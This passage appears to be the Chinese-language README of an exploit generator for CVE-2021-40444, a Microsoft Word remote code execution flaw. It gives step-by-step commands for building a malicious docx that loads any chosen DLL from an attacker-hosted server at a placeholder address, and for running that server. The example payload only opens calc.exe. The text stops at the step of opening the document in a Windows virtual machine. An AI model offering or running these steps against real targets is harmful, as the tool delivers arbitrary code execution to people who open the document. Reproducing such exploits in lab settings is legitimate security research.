恶意 docx 生成器,用于利用 CVE-2021-40444 (Microsoft Office Word 远程代码执行)
此脚本的创建基于对野外使用的样本进行的一些逆向工程:938545f7bbe40738908a95da8cdeabb2a11ce2ca36b0f6a74deda9378d380a52 (docx 文件)
您需要先安装 lcab (sudo apt-get install lcab)
查看 REPRODUCE.md 了解手动复现步骤
如果生成的 cab 不起作用,请尝试将 exploit.html 的 URL 指向 calc.cab
首先,在给定 DLL 的情况下生成恶意 docx 文档,您可以使用 test/calc.dll,该文件通过调用 system() 弹出一个 calc.exe
python3 exploit.py generate test/calc.dll http://<SRV IP>

生成恶意 docx 后(将位于 out/ 目录下),您可以设置服务器:
sudo python3 exploit.py host 80

最后在 Windows 虚拟机中尝试该 docx:
